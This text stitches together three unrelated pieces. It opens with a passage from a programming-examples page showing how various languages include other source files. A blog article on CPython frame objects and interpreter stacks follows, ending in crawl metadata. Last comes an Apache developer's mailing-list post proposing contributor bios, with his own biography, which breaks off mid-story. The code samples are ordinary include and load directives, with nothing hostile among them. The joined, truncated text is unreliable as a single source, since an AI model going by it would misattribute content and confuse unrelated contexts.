To include classes, static methods etc. from other namespaces, include those namespaces with the using keyword
using System.Console;
using is for accessing code that has already been compiled into libraries. Nemerle also allows for creating partial classes (and structs), the source code of which may be split amongst several files as long as the class is marked as partial in each place that part of it is defined. An interesting feature of partial classes in Nemerle is that some parts of partial classes may be written in C# while others are written in Nemerle.
public partial class Foo : Bar // all parts of a partial class must have same access modifier;
{ // the class that a partial class inherits from only needs to
... // be specified in one location
}
NewLISP[edit]
;; local file
(load "file.lsp")
;; URLs (both http:// and file:// URLs are supported)
(load "")
Nim[edit]
After
import someModule an exported symbol
x can be accessed as
x and as
someModule.x.
import someModule
import strutils except parseInt
import strutils as su, sequtils as qu # su.x works
import lib.pure.strutils, lib/pure/os, "lib/pure/times" # still strutils.x
OASYS Assembler[edit]
Use an equal sign at the beginning of a line to include a file:
=util.inc
OCaml[edit]
In script mode and in the interactive loop (the toplevel) we can use:
#use "some_file.ml"
In compile mode (compiled to bytecode or compiled to native code) we can use:
include Name_of_a_module
Oforth[edit]
In order to load a file with name filename :
"filename" load
In order to load a package with name pack :
import: pack
ooRexx[edit]
ooRexx has a package system and no ability for textual inclusion of other text files. Importing of other packages is done via the ::requires directive.
::requires "regex.cls"
OpenEdge/Progress[edit]
Curly braces indicate that a file should be included. The file is searched across all PROPATH directory entries.
{file.i}
Arguments can be passed to the file being included:
{file.i SUPER}
Openscad[edit]
//Include and run the file foo.scad
include <foo.scad>;
//Import modules and functions, but do not execute
use <bar.scad>;
PARI/GP[edit]
Files can be loaded in GP with the
read, or directly in gp with the metacommand
\r.
PARI can use the standard C
#include, but note that if using gp2c the embedded
GP; commands must be in the original file.
Pascal[edit]
Perl[edit]
Here we include the file include.pl into our main program:
main.perl:
#!/usr/bin/perl
do "include.pl"; # Utilize source from another file
sayhello();
include.pl:
sub sayhello {
print "Hello World!";
}
From the documentation: if "do" cannot read the file, it returns undef and sets $! to the error. If "do" can read the file but cannot compile it, it returns undef and sets an error message in $@. If the file is successfully compiled, "do" returns the value of the last expression evaluated.
Perl 6[edit]
Perl 6 provides a module system that is based primarily on importation of symbols rather than on inclusion of textual code:
use MyModule;
However, one can evaluate code from a file:
require 'myfile.p6';
One can even do that at compile time:
BEGIN require 'myfile.p6'
None of these are true inclusion, unless the require cheats and modifies the current input string of the parser. To get a true textual inclusion, one could define an unhygienic textual macro like this:
macro include(AST $file) { slurp $file.eval }
include('myfile.p6');
Phix[edit]
include arwen.ew
Phix also supports relative directory includes, for instance if you include "..\demo\arwen\arwen.ew" then anything that arwen.ew includes will be looked for in the appropriate directory.
PHP[edit]
There are different ways to do this in PHP. You can use a basic include:
include("file.php")
You can be safe about it and make sure it's not included more than once:
include_once("file.php")
You can crash the code at this point if the include fails for any reason by using require:
require("file.php")
And you can use the require statement, with the safe _once method:
require_once("file.php")
PicoLisp[edit]
The function 'load' is used for recursively executing the contents of files.
(load "file1.l" "file2.l" "file3.l")
PL/I[edit]
%include myfile;
PowerBASIC[edit]
Note that PowerBASIC has the optional modifier
ONCE which is meant to insure that no matter how many times the file may be included in code, it will only be inserted by the compiler once (the first time the compiler is told to include that particular file).
Note also that
#INCLUDE and
$INCLUDE function identically.
#INCLUDE "Win32API.inc"
#INCLUDE ONCE "Win32API.inc"
PowerShell[edit]
Import-Module -Name MyModule
<#
When you dot source a script (or scriptblock), all variables and functions defined in the script (or scriptblock) will
persist in the shell when the script ends.
#>
. .\MyFunctions.ps1
Prolog[edit]
consult('filename').
PureBasic[edit]
IncludeFile will include the named source file at the current place in the code.
IncludeFile "Filename"
XIncludeFile is exactly the same except it avoids including the same file several times.
XIncludeFile "Filename"
IncludeBinary will include a named file of any type at the current place in the code. It does not have to be, but preferably should be, placed inside a data block.
IncludeBinary "Filename"
Python[edit]
Python 2 supports the use of execfile to allow code from arbitrary files to be executed from a program (without using its module system); in Python 3 the equivalent is exec(open(filename).read()).
import mymodule
includes the content of mymodule.py
Names in this module can be accessed as attributes:
mymodule.variable
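Both forms can be sketched in one self-contained snippet; the module name `mymodule` and its contents here are illustrative, created on the fly in a temporary directory:

```python
import pathlib
import sys
import tempfile

# Create an example module file to include (illustrative name and content).
tmp = tempfile.mkdtemp()
pathlib.Path(tmp, "mymodule.py").write_text("variable = 42\n")
sys.path.insert(0, tmp)          # make the directory importable

import mymodule                  # module import: names become attributes
print(mymodule.variable)         # prints 42

# Textual inclusion, the Python 3 stand-in for Python 2's execfile:
ns = {}
exec(pathlib.Path(tmp, "mymodule.py").read_text(), ns)
print(ns["variable"])            # prints 42
```

The module form is strongly preferred in practice; exec-based inclusion bypasses the import cache and namespacing.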
R[edit]
source("filename.R")
Racket[edit]
Including files is usually discouraged in favor of using modules, but it is still possible:
#lang racket
(include "other-file.rkt")
RapidQ[edit]
$INCLUDE "RAPIDQ.INC"
Retro[edit]
include filename.ext
REXX[edit]
The REXX language does not include any directives to include source code from other files. A workaround is to use a preprocessor that take the source and the included modules and builds a temporary file containing all the necessary code, which then gets run by the interpreter.
Some variants of REXX may provide implementation specific solutions.
The REXX Compiler for CMS and TSO supports a directive to include program text before compiling the program
/*%INCLUDE member */
Including a file at time of execution[edit]
On the other hand, since REXX is a dynamic language, you can (mis)use some file IO and the INTERPRET statement to include another source file:
/* Include a file and INTERPRET it; this code uses ARexx file IO BIFs */
say 'This is a program running.'
if Open(other,'SYS:Rexxc/otherprogram.rexx','READ') then do
say "Now we opened a file with another chunk of code. Let's read it into a variable."
othercode=''
do until EOF(other)
othercode=othercode || ReadLn(other) || ';'
end
call Close(other)
say 'Now we run it as part of our program.'
interpret othercode
end
say 'The usual program resumes here.'
exit 0
Note: due to the way most REXX interpreters work, functions and jumps (SIGNALs) inside an INTERPRETED program won't work. Neither are labels recognized, which would then exclude the use of those subroutines/functions.
There are also other restrictions such as multi-line statements and comments (more than one line).
Another possibility of errors is the creation of an extremely long value which may exceed the limit for a particular REXX interpreter.
Calling an external program[edit]
Usually, including a file in another is not necessary with REXX, since any script can be called as a function:
Program1.rexx
/* This is program 1 */
say 'This is program 1 writing on standard output.'
call Program2
say 'Thank you, program 1 is now ending.'
exit 0
Program2.rexx
/* This is program 2 */
say 'This is program 2 writing on standard output.'
say 'We now return to the caller.'
return
If a REXX interpreter finds a function call, it first looks in the current program for a function or procedure by that name, then it looks in the standard function library (so you may replace the standard functions with your own versions inside a program), then it looks for a program by the same name in the standard paths. This means that including a file in your program is usually not necessary, unless you want them to share global variables.
RPG[edit]
// fully qualified syntax:
/include library/file,member
// most sensible; file found on *libl:
/include file,member
// shortest one, the same library and file:
/include member
// and alternative:
/copy library/file,member
//... farther like "include"
Ring[edit]
Load 'file.ring'
Ruby[edit]
Note that in Ruby, you don't use the file extension. Ruby will first check for a Ruby (.rb) file of the specified name and load it as a source file. If an .rb file is not found, it will search for files in .so, .o, .dll or other shared-library formats and load them as a Ruby extension.
require will search in a series of pre-determined folders, while
require_relative behaves the same way but searches in the current folder, or another specified folder.
require 'file'
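A minimal self-contained sketch of the extension-less lookup, using an illustrative library file `mylib.rb` written to a temporary directory:

```ruby
require 'tmpdir'

Dir.mktmpdir do |dir|
  # Write an example library file (illustrative name and content).
  File.write(File.join(dir, 'mylib.rb'), "def hello; 'hi from mylib'; end\n")

  # No extension given: Ruby appends .rb when resolving the path.
  require File.join(dir, 'mylib')

  puts hello   # prints: hi from mylib
end
```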
Run BASIC[edit]
You don't use the file extension. .bas is assumed.
run "SomeProgram.bas",#include ' this gives it a handle of #include
render #include ' render will RUN the program with handle #include
Rust[edit]
The compiler will include either a 'test.rs' or a 'test/mod.rs' (if the first one doesn't exist) file.
mod test;
fn main() {
test::some_function();
}
Additionally, third-party libraries (called
crates in rust) can be declared thusly:
extern crate foo;
fn main() {
foo::some_function();
}
Scala[edit]
Some remarks are necessary here. Scala does not define how the source code is stored in files. The language rather talks about compilation units.
In a Scala REPL[1] it's possible to save and load source code.
Seed7[edit]
The Seed7 language is defined in the include file seed7_05.s7i. Therefore seed7_05.s7i must be included before other language features can be used (only comments can be used before). The first include directive (the one which includes seed7_05.s7i) is special and it must be introduced with the $ character.
$ include "seed7_05.s7i";
All following include directives don't need a $ to introduce them. The float.s7i library can be included with:
include "float.s7i";
Sidef[edit]
Include a file in the current namespace:
include 'file.sf';
Include a file as module (file must exists in SIDEF_INC as Some/Name.sm):
include Some::Name;
# variables are available here as: Some::Name::var_name
Smalltalk[edit]
There is no such thing as source-file inclusion in Smalltalk. However, in a REPL or anywhere in code, source code can be loaded with:
aFilename asFilename readStream fileIn
or:
Smalltalk fileIn: aFilename
In Smalltalk/X, which supports binary code loading, aFilename may either be sourcecode or a dll containing a precompiled class library.
SNOBOL4[edit]
-INCLUDE "path/to/filename.inc"
SPL[edit]
$include.txt
Standard ML[edit]
use "path/to/file";
Tcl[edit]
The built-in
source command does exactly inclusion of code into the currently executing scope, subject to minor requirements of being well-formed Tcl script that is sourced in the first place (and the ability to introspect via
info script):
source "foobar.tcl"
Note that it is more usually considered good practice to arrange code into packages that can be loaded in with more regular semantics (including version handling, only-once semantics, integration of code written in other languages such as C, etc.)
package require foobar 1.3
In the case of packages that are implemented using Tcl code, these will actually be incorporated into the program using the
source command, though this is formally an implementation detail of those packages.
UNIX Shell[edit]
With Bourne-compatible shells, the dot operator includes another file.
. myfile.sh # Include the contents of myfile.sh
C Shell[edit]
source myfile.csh
Bash[edit]
. myfile.sh
source myfile.sh
GNU Bash has both
. and the C-Shell style
source. See Bash manual on
source
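The key property of sourcing, as opposed to running a script, is that definitions persist in the calling shell. A self-contained sketch (the file contents and function name are illustrative):

```shell
# Write an example file to source.
tmpfile=$(mktemp)
cat > "$tmpfile" <<'EOF'
greeting="hello"
greet() { echo "$greeting from sourced file"; }
EOF

# Include it in the current shell; '.' is the portable spelling of 'source'.
. "$tmpfile"
greet            # prints: hello from sourced file
rm -f "$tmpfile" # the definitions survive even after the file is gone
```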
Ursa[edit]
Ursa can read in and execute another file using the import statement, similar to Python.
import "filename.u"
Vala[edit]
Importing/including is done during compilation. For example, to compile the program called "maps.vala" with the package "gee":
valac maps.vala --pkg gee-1.0
Functions can be called then using Gee.<function> calls:
var map = new Gee.HashMap<string, int> ();
or with a using statement:
using Gee;
var map = new HashMap<string, int>();
VBScript[edit]
VBScript doesn't come with an explicit include (unless you use the .wsf form). Fortunately, VBScript has the Execute and ExecuteGlobal commands, which allow you to add code dynamically into the local namespace (which disappears when the code goes out of scope) or the global namespace. Thus, all you have to do to include code from a file is read the file into memory and call ExecuteGlobal on that code. Just pass the filename to this sub and all is golden. If you want an error to occur when the file is not found, just remove the FileExists test.
Include "D:\include\pad.vbs"
Wscript.Echo lpad(12,14,"-")
Sub Include (file)
dim fso: set fso = CreateObject("Scripting.FileSystemObject")
if fso.FileExists(file) then ExecuteGlobal fso.OpenTextFile(file).ReadAll
End Sub
If you use the wsf form you can include a file by
<script id="Connections" language="VBScript" src="D:\include\ConnectionStrings.vbs"/>
If you use the following form then you can define an environment variable, %INCLUDE% and make your include library more portable as in
Include "%INCLUDE%\StrFuncs.vbs"
Function Include ( ByVal file )
Dim wso: Set wso = CreateObject("Wscript.Shell")
Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
ExecuteGlobal(fso.OpenTextFile(wso.ExpandEnvironmentStrings(file)).ReadAll)
End Function
Verbexx
/*******************************************************************************
* /# @INCLUDE file:"filename.filetype"
* - file: is just the filename
* - actual full pathname is VERBEXX_INCLUDE_PATH\filename.filetype
* where VERBEXX_INCLUDE_PATH is the contents of an environment variable
*
* /# @INCLUDE file:"E:\xxx\xxx\xxx\filename.filetype"
* - file: specifies the complete pathname of file to include
*
* @INCLUDE verb can appear only in pre-processor code (after /# /{ etc.)
*******************************************************************************/
/{ //////////////////////////////////////////////// start of pre-processor code
@IF (@IS_VAR include_counter)
else:{@VAR include_counter global: = 0}; // global, so all code sees it
include_counter++;
@SAY " In pre-processor -- include counter = " include_counter;
@IF (include_counter < 3)
then:{@INCLUDE file:"rosetta\include_a_file.txt"}; // include self
}/ ////////////////////////////////////////////////// end of pre-processor code
@SAY "Not in pre-processor -- include_counter = " include_counter;
/]
- Output:
In preprocessor -- include_counter = 1
In preprocessor -- include_counter = 2
In preprocessor -- include_counter = 3
Not in preprocessor -- include_counter = 3
Not in preprocessor -- include_counter = 3
Not in preprocessor -- include_counter = 3
x86 Assembly
include 'MyFile.INC'
%include "MyFile.INC"
XPL0
include c:\cxpl\stdlib;
DateOut(0, GetDate)
- Output:
09-28-12
zkl
include(vm.h.zkl, compiler.h.zkl, zkl.h.zkl, opcode.h.zkl);
ZX Spectrum Basic
It is possible to include the contents of another program using the merge command. However, line numbers that coincide with those of the original program will be overwritten, so it is best to reserve a block of line numbers for merged code:
10 GO TO 9950
5000 REM We reserve line numbers 5000 to 8999 for merged code
9000 STOP: REM In case our line numbers are wrong
9950 REM Merge in our module
9955 MERGE "MODULE"
9960 REM Jump to the merged code. Pray it has the right line numbers!
9965 GO TO 5000
Python’s Innards: Interpreter Stacks
2010/07/22
Those of you who have been paying attention know that this series is spiraling towards what can be considered the core of Python’s Virtual Machine, the “actually do work function” ./Python/ceval.c: PyEval_EvalFrameEx. The (hopefully) last hurdle on our way there is to understand the three significant stack data structures used for CPython’s code evaluation: the call stack, the value stack and the block stack (I’ve called them collectively “Interpreter Stacks” in the title, this isn’t a formal term). All three stacks are tightly coupled with the frame object, which will also be discussed today. If you give me a minute to put on my spectacles, I’ll read to you what Wikipedia says about call stacks in general:
In computer science, a call stack is a stack data structure that stores information about the active subroutines of a computer program… A call stack is composed of stack frames (…). These are machine dependent data structures containing subroutine state information. Each stack frame corresponds to a call to a subroutine which has not yet terminated with a return. Hrmf. Jim, I don’t understand… how does this translate to a virtual machine?
Well, since CPython implements a virtual machine, its call stack and stack frames are dependent on this virtual machine, not on the physical machine it's running on. And also, as Python tends to do, this internal implementation detail is exposed to Python code, either via the C-API or pure Python, as frame objects (./Include/frameobject.h: PyFrameObject). We know that code execution in CPython is really the evaluation (interpretation) of a code object, so every frame represents a currently-being-evaluated code object. We'll see (and already saw before) that frame objects are linked to one another, thus forming a call stack of frames. Finally, inside each frame object in the call stack there's a reference to two frame-specific stacks (not directly related to the call stack): the value stack and the block stack.
The value stack (you may know this term as an ‘evaluation stack’) is where manipulation of objects happens when object-manipulating opcodes are evaluated. We have seen the value stack before on various occasions, like in the introduction and during our discussion of namespaces. Recalling an example we used before, BINARY_SUBTRACT is an opcode that effectively pops the two top objects in the value stack, performs PyNumber_Subtract on them and sets the new top of the value stack to the result. Namespace related opcodes, like LOAD_FAST or STORE_GLOBAL, load values from a namespace to the stack or store values from the stack to a namespace. Each frame has a value stack of its own (this makes sense in several ways, possibly the most prominent is simplicity of implementation), we’ll see later where in the frame object the value stack is stored.
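As a quick illustration (a sketch — exact opcode names vary between CPython versions; in the 2.x line discussed here the subtraction compiles to BINARY_SUBTRACT), disassembling a small function shows the value-stack choreography:

```python
import dis

def sub(a, b):
    return a - b

# Two LOAD_FAST opcodes push a and b onto the value stack; the binary
# subtract opcode pops both operands and pushes the result, which
# RETURN_VALUE then pops off the stack to hand back to the caller.
dis.dis(sub)
```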
This leaves us with the block stack, a fairly simple concept with some vaguely defined terminology around it, so pay attention. Python has a notion called a code block, which we have discussed in the article about code objects and which is also explained here. Completely unrelatedly, Python also has a notion of compound statements, which are statements that contain other statements (the language reference defines compound statements here). Compound statements consist of one or more clauses, each made of a header and a suite. Even if the terminology wasn’t known to you until now, I expect this is all instinctively clear to you if you have almost any Python experience: for, try and while are a few compound statements.
So where’s the confusion? In various places throughout the code, a block (sometimes “frame block”, sometimes “basic block”) is used as a loose synonym for a clause or a suite, making it easier to confuse suites and clauses with what’s actually a code block or vice versa. Both the compilation code (./Python/compile.c) and the evaluation code (./Python/ceval.c) are aware of various suites and have (ill-named) data structures to deal with them; but since we’re more interested in evaluation in this series, we won’t discuss the compilation-related details much (or at all). Whenever I’ll think wording might get confusing, I’ll mention the formal terms of clause or suite alongside whatever code term we’re discussing.
With all this terminology in mind we can look at what’s contained in a frame object. Looking at the declaration of ./Include/frameobject.h: PyFrameObject, we find (comments were trimmed and edited for your viewing pleasure):
typedef struct _frame {
    PyObject_VAR_HEAD
    struct _frame *f_back;      /* previous frame, or NULL */
    PyCodeObject *f_code;       /* code segment */
    PyObject *f_builtins;       /* builtin symbol table */
    PyObject *f_globals;        /* global symbol table */
    PyObject *f_locals;         /* local symbol table */
    PyObject **f_valuestack;    /* points after the last local */
    PyObject **f_stacktop;      /* current top of valuestack */
    PyObject *f_trace;          /* trace function */

    /* used for swapping generator exceptions */
    PyObject *f_exc_type, *f_exc_value, *f_exc_traceback;

    PyThreadState *f_tstate;    /* call stack's thread state */
    int f_lasti;                /* last instruction if called */
    int f_lineno;               /* current line # (if tracing) */
    int f_iblock;               /* index in f_blockstack */

    /* for try and loop blocks */
    PyTryBlock f_blockstack[CO_MAXBLOCKS];

    /* dynamically: locals, free vars, cells and valuestack */
    PyObject *f_localsplus[1];  /* dynamic portion */
} PyFrameObject;
We see various fields used to store the state of this invocation of the code object as well as maintain the call stack's structure. Both in the C-API and in Python these fields are all prefixed by f_, though not all the fields of the C structure PyFrameObject are exposed in the pythonic representation. I hope some of the fields are intuitively clear to you, since these fields relate to many topics we have already covered. We already mentioned the relation between frame and code objects, so the f_code field of every frame points to precisely one code object. Insofar as structure goes, frames point backwards, thus creating a stack (f_back), as well as point "root-wards" in the interpreter state/thread state/call stack structure by pointing to their thread state (f_tstate), as explained here. Finally, since you always execute Python code in the context of three namespaces (as discussed there), frames have the f_builtins, f_globals and f_locals fields to point to these namespaces. These are the fields (I hope) we already know.
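Since these fields are exposed to pure Python (via the CPython-specific sys._getframe), a small sketch can confirm the f_back link and the namespace pointers directly:

```python
import sys

def inner():
    f = sys._getframe()                        # the frame being evaluated right now
    assert f.f_code.co_name == "inner"         # frame -> code object link
    assert f.f_back.f_code.co_name == "outer"  # f_back links the call stack
    assert f.f_globals is globals()            # the global namespace in use
    return f.f_back.f_code.co_name

def outer():
    return inner()

print(outer())   # -> outer
```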
Before we dig into the other fields of a frame object, please notice frames are a variable size Python object (they are a PyObject_VAR_HEAD). The reason is that when a frame object is created it should be dynamically allocated to be large enough to contain references (pointers, really) to the locals, cells and free variables used by its code object, as well as the value stack needed by the code objects ‘deepest’ branch. Indeed, the last field of the frame object, f_localsplus (locals plus cells plus free variables plus value stack…) is a dynamic array where all these references are stored. PyFrame_New will show you exactly how the size of this array is computed.
If the previous paragraph doesn’t sit well with you, I suggest you read the descriptions I wrote for co_nlocals, co_cellvars, co_freevars and co_stacksize – during evaluation, all these ‘dead’ parts of the inert code object come to ‘life’ in space allocated at the end of the frame. As we’ll probably see in the next article, when the frame is evaluated, these references at the end of the frame will be used to get (or set) “fast” local variables, free variables and cell variables, as well as to the variables on the value stack (“fast” locals was explained when we discussed namespaces). Looking back at the commented declaration above and given what I said here, I believe you should now understand f_valuestack, f_stacktop and f_localsplus.
We can now look at f_blockstack, keeping in mind the terminology clarification from before. As you can maybe imagine, compound statements sometimes require state to be evaluated. If we’re in a loop, we need to know where to go in case of a break or a continue. If we’re raising an exception, we need to know where is the innermost enclosing handler (the suite of the closest except header, in more formal terms). This state is stored in f_blockstack, a fixed size stack of PyTryBlock structures which keeps the current compound statement state for us (PyTryBlock is not just for try blocks; it has a b_type field to let it handle various types of compound statements’ suites). f_iblock is an offset to the last allocated PyTryBlock in the stack. If we need to bail out of the current “block” (that is, the current clause), we can pop the block stack and find the new offset in the bytecode from which we should resume evaluation in the popped PyTryBlock (look at its b_handler and b_level fields). A somewhat special case is a raised exception which exhausts the block stack without being caught, as you can imagine, in that case a handler will be sought in the block stack of the previous frames on the call stack.
All this should easily click into place now if you read three code snippets. First, look at this disassembly of a for statement (this would look strikingly similar for a try statement):
>>> def f():
...     for c in 'string':
...         my_global_list.append(c)
...
>>> diss(f)
  2           0 SETUP_LOOP              27 (to 30)
              3 LOAD_CONST               1 ('string')
              6 GET_ITER
        >>    7 FOR_ITER                19 (to 29)
             10 STORE_FAST               0 (c)

  3          13 LOAD_GLOBAL              0 (my_global_list)
             16 LOAD_ATTR                1 (append)
             19 LOAD_FAST                0 (c)
             22 CALL_FUNCTION            1
             25 POP_TOP
             26 JUMP_ABSOLUTE            7
        >>   29 POP_BLOCK
        >>   30 LOAD_CONST               0 (None)
             33 RETURN_VALUE
>>>
Next, look at how the opcodes SETUP_LOOP and POP_BLOCK are implemented in ./Python/ceval.c. Notice that SETUP_LOOP and SETUP_EXCEPT or SETUP_FINALLY are rather similar, they all push a block matching the relevant suite unto the block stack, and they all utilize the same POP_BLOCK:
TARGET_WITH_IMPL(SETUP_LOOP, _setup_finally)
TARGET_WITH_IMPL(SETUP_EXCEPT, _setup_finally)
TARGET(SETUP_FINALLY)
_setup_finally:
    PyFrame_BlockSetup(f, opcode, INSTR_OFFSET() + oparg,
                       STACK_LEVEL());
    DISPATCH();

TARGET(POP_BLOCK)
    {
        PyTryBlock *b = PyFrame_BlockPop(f);
        UNWIND_BLOCK(b);
    }
    DISPATCH();
Finally, look at the actual implementation of ./Object/frameobject.c: PyFrame_BlockSetup and ./Object/frameobject.c: PyFrame_BlockPop:
void
PyFrame_BlockSetup(PyFrameObject *f, int type, int handler, int level)
{
    PyTryBlock *b;
    if (f->f_iblock >= CO_MAXBLOCKS)
        Py_FatalError("XXX block stack overflow");
    b = &f->f_blockstack[f->f_iblock++];
    b->b_type = type;
    b->b_level = level;
    b->b_handler = handler;
}

PyTryBlock *
PyFrame_BlockPop(PyFrameObject *f)
{
    PyTryBlock *b;
    if (f->f_iblock <= 0)
        Py_FatalError("XXX block stack underflow");
    b = &f->f_blockstack[--f->f_iblock];
    return b;
}
There, now you’re smart. If you keep the terminology straight, f_blockstack turns out to be rather simple, at least in my book.
We’re left with the rather esoteric fields, some simpler, some a bit more arcane. In the ‘simpler’ range we have f_lasti, an integer offset into the bytecode of the last instructions executed (initialized to -1, i.e., we didn’t execute any instruction yet). This index lets us iterate over the opcodes in the bytecode stream. Heading towards the ‘more arcane’ area we see f_trace and f_lineno. f_trace is a pointer to a tracing function (see sys.settrace; think implementation of a tracer or a debugger). f_lineno contains the line number of the line which caused the generation of the current opcode; it is valid only when tracing (otherwise use PyCode_Addr2Line). Last but not least, we have three exception fields (f_exc_type, f_exc_value and f_exc_traceback), which are rather particular to generators so we’ll discuss them when we discuss that beast (there’s a longer comment about these fields in ./Include/frameobject.h if you’re curious right now).
On a parting note, we can mention when frames are created. This happens in ./Objects/frameobject.c: PyFrame_New, usually called from ./Python/ceval.c: PyEval_EvalCodeEx (and ./Python/ceval.c: fast_function, a specialized optimization of PyEval_EvalCodeEx). Frame creation occurs whenever a code object should be evaluated, which is to say when a function is called, when a module is imported (the module's top-level code is executed), whenever a class is defined, for every discrete command entered in the interactive interpreter, when the builtins eval or exec are used and when the -c switch is used (I didn't absolutely verify this is a 100% exhaustive list, but I think it's rather complete).
Looking at the list in the previous paragraph, you probably realized frames are created very often, so two optimizations are implemented to make frame creation fast: first, code objects have a field (co_zombieframe) which allows them to remain associated with a ‘zombie’ (dead, unused) frame object even when they’re not evaluated. If a code object was already evaluated once, chances are it will have a zombie frame ready to be reanimated by PyFrame_New and returned instead of a newly allocated frame (trading some memory to reduce the number of allocations). Second, allocated and entirely unused stack frames are kept in a special free-list (./Objects/frameobject.c: free_list), frames from this list will be used if possible, instead of actually allocating a brand new frame. This is all kindly commented in ./Objects/frameobject.c.
That’s it, I think. Oh, wait: if you’d like to play with frames in your interpreter, take a look at the inspect module, maybe especially this part of it. In gdb, I used a rather crude method to look at the call stack (I dereferenced the global variable interp_head and went on from there). There’s probably a better way, but I didn’t bother looking. Now that’s really it. In fact, I believe at last we covered enough material to analyze ./Python/ceval.c: PyEval_EvalFrameEx. Ladies and Gentlemen, we can read it. We have the technology.
But, alas, we’ll only do it in the next post, and who knows when that will arrive. And until it does, do good, avoid doing bad and keep clearing your mind. Siddhārtha Gautama said that, and I tend to think that if that particular bloke lived today he’d have some serious Python-Fu going for him, so heed his words.
I would like to thank Nick Coghlan for reviewing this article; any mistakes that slipped through are my own. | http://tech.blog.aknin.name/tag/block-stack/ | CC-MAIN-2015-06 | refinedweb | 2,356 | 55.47 |
The Apache spirit is all about communities.
But communities are hard to build, hard to maintain and hard to
recognize.
A short story: when I first entered the Apache world, I was scared to
death by the *mythical* flame-rate on "new-httpd" (the list where the
Apache HTTPD project was born and was developpped), so much so that I
*never* ever wrote a single email on that list.
It was Ed Korthof that was telling us how "safe and easy" was to live
into JServ-land, compared to new-httpd land.
But it was sad for Jon, Pier and I to see all the *recognized* people
taking a picture together at the first ApacheCON, holding the feather,
and we, working on the "sister-project" java.apache.org, just left
aside, ignored.
Oh, don't get me wrong: we didn't deserve to be on that picture.
Absolutely not! we *were* a simple sister project. JServ wasn't even a
released project at that time (1998), there was no java recognition for
servlets (the first JSDK was released in 1997), no J2EE, no .com
marketing stuff from Sun.
It it wasn't for Brian Behlendorf who was subscribed to the jserv mail
list (not even hosted on apache.org servers at that time!) and was
watching over us, I would not be here preaching to the converted.
Just like the original Apache tribes, "communication" between the
experienced and the unexperienced passes the *spirit* along.
I was afraid of new-httpd because I didn't know it. I didn't know the
people there, I just imagined they were gurus and I was a stupid
22-years-old geek trying to run a stupid servlet!
Why am I telling you this?
I have the sensation that some of you silent lurkers might want to say
something, stand up and share your sensations, but you are afraid of
doing so because you don't know us. You don't know how similar we are
with you all.
*we* can be used for "Apache Members" or "Cocoon Active Developers" or
"recognized open source people", up to you.
So, if these short BIO's might seem as a ego showoff, on the other hand
are a foundation, a *context* where you place a name in order to
picture him/her closer to your world.
I met many people from the Apache world, but not so many from this list
and I find out that even *I* need these BIOs to get a better sense of
resonation with you guys.
In the past, I avoided giving information on myself to the public
because I found it shamefull to use this list as a way to show off, but
now I feel that it might be useful to remove the sense of *myth* and
fear that this lack of info surrounded me.
So you'll find my short BIO down below and I also propose to make this a
requirement: every active developer needs to be listed on the web, along
with his self-written BIO and a small (possibly funny!) picture of him.
This wants to remove the feeling of "guru-ness" that might surround us,
making it obvious that we are not that different from any of you and you
just need to volunteer some of your energy to be an active part of this
community.
What do you think?
Anyway, here we go:
- o -
My not-so-short BIO
-------------------
I was born on January 20, 1975 in Pavia, Italy, small town 35Km south of
Milano (northern part of italy).
I wrote my first computer program at the age of 7 on my first computer,
a Commodore VIC-20: it calculated the areas of simple poligons and the
volumes of simple solids. Unfortunately, there was no italian
translation of more in-depth books, so even if I knew what machine
language was, I never had the chance to use it on my commodore machines
(later I got a C-64, but still programming with BASIC only, so I moved
away).
I moved to Lego, which was more fun. I believe that I owe 40% of my
intellectual capabilities to those magic plastic pieces. In fact, I
still have all of them (and even bought new ones over the years! more on
this later)
Then my uncle bought a Amstrad 8086 with VGA. I learned DOS the hard
way: by typing each and every command (still didn't know english at that
time, having learned french in middle school). Typing HDFormat replied:
"this will erase all the content of the disk. Are you sure? [Y/N]".
After pressing Y I also had to learn how to install an operating system
in a few hours :)
Anyway, I moved to highschool and learned my first english and my first
Pascal. Both weren't really appreciated at first, but became important
later on. Again, having learned how to write thousands lines of basic
code on Commodore BASIC and Microsoft GWBasic (raster graphics, yes!),
GOTO was my second best friend. I cried its death a long time, but it
showed me something:
"if a computer language doesn't change the way you think about
programming, it's not worth knowing"
This was my first email signature. Look up yourself who wrote it.
Italian high school was hard and not that interesting, so I decided to
shake my life a little: I signed up for the exchange-student program at
the age of 16 and happened to be choosen to attend my senior year at the
Siuslaw High School of I landed in Florence, Or, U.S.A. where I became
sort of a legend because I was student of the month *and* playing
varsity football *and* basketball.
That was a fun year: it changed my english skills a lot and opened my
mind a lot.
Also, got my first impact with C: the regular computer-science classes
were boring and incredibly easy (on Borland Turbo Pascal) so, with other
two kids, they created a special "advanced" computer-science class where
we could do whatever we wanted. In short: they gave us the computers to
play with.
It was 1991 and I wrote my first 3d game using Pascal and Borland BGI
(slow as hell, but still didn't know assembly!): you were a mouse and
you had to escape a maze. At the same time, ID Software was working on
Wolfenstein 3D.
Graduation. Back to italy. Another year to finish italian high school
(we have five years, not four). Another graduation. Then college.
I choose to remain at the university of Pavia because it was easier for
everybody and I took Electronic Engineering.
It was 1992. That year, another two guys arrived in Pavia to go to
college: Pierpaolo Fumagalli and Federico Barbieri. I met Federico
because one of my best friends introduced me to him as "the guy who
could prove the mythical prof. XYZ wrong in front of the class", but our
streets didn'c cross until next year.
1993. Virtual Reality is still the hype, doom is the game, I started
searching on 3D algorithms and designed a data-glove with force
feedback. Met Federico again and he told me he was designing a
data-glove with force feedback. It was instant resonance: since that
day, we spent almost two years doing stuff together.
Federico and Pier were living in the same building, so I met Pierpaolo
(who had moved into Milano's DSI that year) and met Linux for the first
time.
Along with another guy, Fabrizio (who might see in the future around
Apache since he's doing his thesis on AOP!), we started "Beta Version
Productions" and we started preparing a demo for finnish "Assembly", the
*best* show on the demo scene ever.
Federico and Pier introduced me into x86 assembly and together we wrote
a pure-assembly 3D engine on our 486 66Mhz. We impressed out friends
(and our girlfriends) with flying and rotating shaded objects and also
moving stereograms.
Also, Fabrizio and I also spent some 6 months implementing a
psycoacustic model for spatial sound rendering but found out it nearly
impossible to do a general model for everybody's ear.
It was around 1996 when the 3D hardware accelerators hit massmarket and
killed any serious effort in the demo scene: we were far from releasing
our demo, but knew we didn't have any hope to survive the hardware
capabilities of those graphic cards.
It was a disaster for us: everything we had invested was vanishing
quickly and we had to turn into something else. Pier suggested Linux. I
suggested Java.
In 1997, we got a contract with a friend of Pier's to build a small
commercial web application: we decided to use servlets. It turned out to
be a very bad choice for that particular project, but a great choice for
our future.
Federico was writing the servlets, Pier the graphics and installing the
system, I was doing the glue. And JServ 0.9.7 sucked.
